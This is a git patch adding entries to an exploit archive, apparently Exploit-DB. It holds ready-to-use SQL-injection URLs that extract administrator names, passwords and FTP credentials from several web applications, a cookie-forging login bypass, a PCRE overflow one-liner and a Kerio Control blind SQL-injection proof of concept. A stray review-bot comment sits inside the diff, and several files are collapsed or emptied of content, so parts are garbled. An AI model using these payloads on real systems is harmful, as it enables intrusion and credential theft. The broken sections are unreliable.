From 7851596ba79ce3a1b32b872dfdab163522e42c7d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 4 Jul 2014 04:39:46 +0000
Subject: [PATCH] Updated 07_04_2014
---
 files.csv | 9 ++++
 platforms/cfm/webapps/33948.txt | 10 ++++
 platforms/linux/remote/33949.txt | 9 ++++
 platforms/php/webapps/33945.txt | 12 +++++
 platforms/php/webapps/33946.txt | 10 ++++
 platforms/php/webapps/33947.txt | 7 +++
 platforms/php/webapps/33950.txt | 7 +++
 platforms/php/webapps/33953.txt | 32 +++++++++++
 platforms/php/webapps/33954.txt | 66 +++++++++++++++++++++++
 platforms/windows/dos/33951.txt | 63 ++++++++++++++++++++++
 platforms/windows/remote/24017.html | 84 +++++++++++++++++------------
 11 files changed, 275 insertions(+), 34 deletions(-)
 create mode 100755 platforms/cfm/webapps/33948.txt
 create mode 100755 platforms/linux/remote/33949.txt
 create mode 100755 platforms/php/webapps/33945.txt
 create mode 100755 platforms/php/webapps/33946.txt
 create mode 100755 platforms/php/webapps/33947.txt
 create mode 100755 platforms/php/webapps/33950.txt
 create mode 100755 platforms/php/webapps/33953.txt
 create mode 100755 platforms/php/webapps/33954.txt
 create mode 100755 platforms/windows/dos/33951.txt
diff --git a/files.csv b/files.csv
index 043d25b73..f11e391fa 100755
--- a/files.csv
+++ b/files.csv
@@ -30570,3 +30570,12 @@ id,file,description,date,author,platform,type,port
 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80
 33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080
 33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass",2014-07-01,sickness,windows,remote,0
+33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x 'newpost.php' SQL Injection Vulnerability",2010-05-06,"Stefan Esser",php,webapps,0
+33946,platforms/php/webapps/33946.txt,"EmiratesHost Insecure Cookie Authentication Bypass Vulnerability",2010-02-01,jago-dz,php,webapps,0
+33947,platforms/php/webapps/33947.txt,"Last Wizardz 'id' Parameter SQL Injection Vulnerability",2010-01-31,"Sec Attack Team",php,webapps,0
+33948,platforms/cfm/webapps/33948.txt,"Site Manager 3.0 'id' Parameter SQL Injection Vulnerability",2010-01-31,"Sec Attack Team",cfm,webapps,0
+33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow Vulnerability",2010-05-06,"Michael Santos",linux,remote,0
+33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection Vulnerability",2010-01-31,s4r4d0,php,webapps,0
+33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
+33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80
+33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
diff --git a/platforms/cfm/webapps/33948.txt b/platforms/cfm/webapps/33948.txt
new file mode 100755
index 000000000..3589b7a16
--- /dev/null
+++ b/platforms/cfm/webapps/33948.txt
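Review bot: The new 33949 row states the affected range as `PCRE <= 6.2`, while the advisory it indexes, platforms/linux/remote/33949.txt added in this same commit, says versions prior to PCRE 8.02 are vulnerable; an index row that under-states the affected range misleads anyone triaging installed versions against this file. The two should be reconciled against the reference the advisory cites (securityfocus bid/39974) rather than guessed; if the advisory text is the accurate one, the row would read `"PCRE < 8.02 Regular Expression Compiling Workspace Buffer Overflow Vulnerability"`. The same kind of check is worth running on the other rows added here, since the index is what downstream tooling consumes.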
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39973/info
+
+Site Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Site Manager 3.0 is vulnarable; other versions may also be affected.
+
+http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author
+http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,conca(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata
\ No newline at end of file
diff --git a/platforms/linux/remote/33949.txt b/platforms/linux/remote/33949.txt
new file mode 100755
index 000000000..cb53c381a
--- /dev/null
+++ b/platforms/linux/remote/33949.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39974/info
+
+PCRE is prone to a buffer-overflow vulnerability because the library fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage this issue to execute arbitrary code in the context of an application using the PCRE library. Failed attacks may result in denial-of-service conditions.
+
+Versions prior to PCRE 8.02 are vulnerable; applications which use the PCRE library may also be affected.
+
+perl -e 'print "/","("x819, ")"x819, "/"' | pcretest
\ No newline at end of file
diff --git a/platforms/php/webapps/33945.txt b/platforms/php/webapps/33945.txt
new file mode 100755
index 000000000..f09cafdcf
--- /dev/null
+++ b/platforms/php/webapps/33945.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/39962/info
+
+DeluxeBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+DeluxeBB 1.3 and earlier versions are vulnerable.
+
+The following example data is available:
+
+membercookie=guest
+memberid=xx',(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),'none',0,0,0,0,0,'guest','1269081154')+--+x
\ No newline at end of file
diff --git a/platforms/php/webapps/33946.txt b/platforms/php/webapps/33946.txt
new file mode 100755
index 000000000..9389daadb
--- /dev/null
+++ b/platforms/php/webapps/33946.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39963/info
+
+EmiratesHost is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
+
+Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
+
+The following example data is available:
+
+www.example.com/admin
+javascript:document.cookie="login=right;path=/";
\ No newline at end of file
diff --git a/platforms/php/webapps/33947.txt b/platforms/php/webapps/33947.txt
new file mode 100755
index 000000000..66ad4ce4b
--- /dev/null
+++ b/platforms/php/webapps/33947.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39968/info
+
+Last Wizardz is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/content.php?id=NULL+UNION+ALL+SELECT+1,CONCAT(id,0x3a,admin,0x3a,admin_pass),3,4,5,6,7,8+FROM+site_admin
\ No newline at end of file
diff --git a/platforms/php/webapps/33950.txt b/platforms/php/webapps/33950.txt
new file mode 100755
index 000000000..294ab298e
--- /dev/null
+++ b/platforms/php/webapps/33950.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39978/info
+
+HAWHAW is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wap/newsread.php?storyid=-1+UNION+SELECT+1,@@version,3,4
\ No newline at end of file
diff --git a/platforms/php/webapps/33953.txt b/platforms/php/webapps/33953.txt
new file mode 100755
index 000000000..4f22b8ea9
--- /dev/null
+++ b/platforms/php/webapps/33953.txt
@@ -0,0 +1,32 @@ +# Affected software: Zurmo CRM +# Zurmo is an Open Source Customer Relationship Management (CRM) +application that is +# mobile, social, and gamified. We use a test-driven methodology for +building every part of the # application. +# Type of vulnerability: XSS Stored +# URL: zurmo.com +# +# Discovered by: Provensec +# Website: http://www.provensec.com + +# Description: ZumoCRM is prone to a Persistent Cross Site Scripting attack +that allows a malicious user to inject HTML or scripts that can access any +cookies, session tokens, or other +sensitive information retained by your browser and used with that site. +# Proof of concept +# 1. Create a report as a Normal user +# 2. Select module: Accounts +# 3. Select filter: Name +# 4. Select column Employees and as a value use: "> +# 5. Save the report and share it with other users to distribute your +malicious code. + +Screenshot attached + +JSacco +CTO - Provensec.com + +"Think as a hacker, be professional" +URL: http://provensec.com +Mobile: +31 6 8209 2565 diff --git a/platforms/php/webapps/33954.txt b/platforms/php/webapps/33954.txt new file mode 100755 index 000000000..d9646dd1d --- /dev/null +++ b/platforms/php/webapps/33954.txt 
@@ -0,0 +1,66 @@
+Document Title:
+======================
+Kerio Control <= 8.3.1 Boolean-based blind SQL Injection
+
+Primary Informations:
+======================
+
+Product Name: Kerio Control
+Software Description: Kerio Control brings together multiple capabilities
+ including a network firewall and router, intrusion detection and
+ prevention (IPS), gateway anti-virus, VPN and content filtering. These
+ comprehensive capabilities and unmatched deployment flexibility make
+ Kerio Control the ideal choice for small and mid-sized businesses.
+Affected Version: Latest Version - 8.3.1 (released on 2014-05-20)
+Vendor Website: http://kerio.com
+Vulnerability Type: Boolean-based blind SQL Injection
+Severity Level: Very High
+Exploitation Technique: Remote
+CVE-ID: CVE-2014-3857
+Discovered By: Khashayar Fereidani
+Main Reference: http://fereidani.com/articles/show/76_kerio_control_8_3_1_boolean_based_blind_sql_injection
+Researcher's Websites: http://fereidani.com http://fereidani.ir
+ http://und3rfl0w.com http://ircrash.com
+Researcher's Email: info [ a t ] fereidani [ d o t ] com
+
+
+Technical Details:
+=======================
+
+Kerio Control suffers from a SQL Injection Vulnerability which can lead to gain users
+ sensitive informations like passwords , to use this vulnerability attacker need a
+ valid client username and password . 
+
+Vulnerable path: /print.php
+Vulnerable variables: x_16 and x_17
+HTTP Method: GET
+
+Proof Of Concept:
+=======================
+
+Blind Test:
+ TRUE: https://[SERVER IP]:4081/print.php?x_w=overall&x_14=L1&x_15=stats&x_16=16221 AND 1=1&x_17=16221&x_18=-1&x_1b=&x_1a=&x_1l=[ VALID SESSION]&x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}&x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}&x_1c=&x_1e=-270&x_1f=-1&x_3m=0&x_11=overall&x_12=individual&x_13=x_2l
+ FALSE: https://[SERVER IP]:4081/print.php?x_w=overall&x_14=L1&x_15=stats&x_16=16221 AND 1=2&x_17=16221&x_18=-1&x_1b=&x_1a=&x_1l=[ VALID SESSION]&x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}&x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}&x_1c=&x_1e=-270&x_1f=-1&x_3m=0&x_11=overall&x_12=individual&x_13=x_2l
+
+
+Solution:
+========================
+Valid escaping variables or type checking for integer
+
+
+Exploit:
+========================
+Private
+
+
+Vulnerability Disclosure Timeline:
+==================================
+May 30 2014 - Disclosure
+May 31 2014 - Received a CVE ID
+May 31 2014 - Initial Report to Kerio Security Team
+June 3 2014 - Support team replied fix is planned to be included in a future release
+June 30 2014 - Patched
+July 1 2014 - Publication
+
+
+ Khashayar Fereidani - http://fereidani.com
\ No newline at end of file
diff --git a/platforms/windows/dos/33951.txt b/platforms/windows/dos/33951.txt
new file mode 100755
index 000000000..9ecb74a2c
--- /dev/null
+++ b/platforms/windows/dos/33951.txt
@@ -0,0 +1,63 @@
+ + + + +Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC + +
+

Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC

+ +
+ + + diff --git a/platforms/windows/remote/24017.html b/platforms/windows/remote/24017.html index 3c656f72c..12e1a42d2 100755 --- a/platforms/windows/remote/24017.html +++ b/platforms/windows/remote/24017.html @@ -11,11 +11,12 @@ ** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb ** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 +** Old version of the exploit available at: http://www.exploit-db.com/sploits/24017_old.zip #################################################################### -** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :) -** To get it working on a different version of Windows you will require to make your own chances to the exploit :) +** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :) +** To get it working on a different version of Windows you will require to make your own chances to the exploit :) ** Have fun :) --> @@ -26,7 +27,7 @@ - + \ No newline at end of file